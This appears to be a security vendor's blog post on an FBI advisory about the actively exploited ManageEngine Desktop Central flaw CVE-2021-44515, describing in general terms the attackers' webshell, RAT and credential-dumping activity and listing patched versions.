A vulnerability in Zoho’s ManageEngine Desktop Central software is actively being exploited by APT threat actors, according to a new advisory from the FBI. The vulnerability, tracked as CVE-2021-44515, allows for a malicious user to bypass authentication within ManageEngine Desktop Central and execute arbitrary code on the server.
The FBI and security researchers have detected threat actors exploiting this vulnerability in order to establish a foothold within a network or escalate their privileges. Once they have established a foothold, these threat actors have been seen downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement, and dumping credentials. Initial reconnaissance is performed via a webshell that the threat actors inject into the Desktop Central software, which overrides the legitimate Desktop Central API servlet endpoint. Once the reconnaissance is completed, the threat actors have been seen dropping malware with RAT-like functionality that then establishes persistence via a service and injects itself into a svchost process for execution and defense evasion. Further activity by the threat actors is then performed through the remote access trojan (RAT).
As of earlier this month, Zoho has released patches for its Desktop Central platform to remediate this vulnerability.
Initial recommendations would be for any organization running vulnerable software to get it patched immediately; any organization running version 10.1.2127.17 and below can upgrade to 10.1.2127.18 to remediate the vulnerability, and any organizations running 10.1.2128.0 to 10.1.2137.2 can upgrade to 10.1.2137.3. Likewise, the techniques and tools utilized by the threat actors exploiting this vulnerability can be prevented by common endpoint detection and response (EDR) tools or, at the very least, detected on. For example, the threat actors have been seen using BITSAdmin to download the malware payload and Mimikatz or LSASS dumping to dump credentials, which are common techniques used by threat actors that can be prevented or detected. Binary Defense’s Managed Detection and Response service is an excellent asset to help with detecting this sort of activity.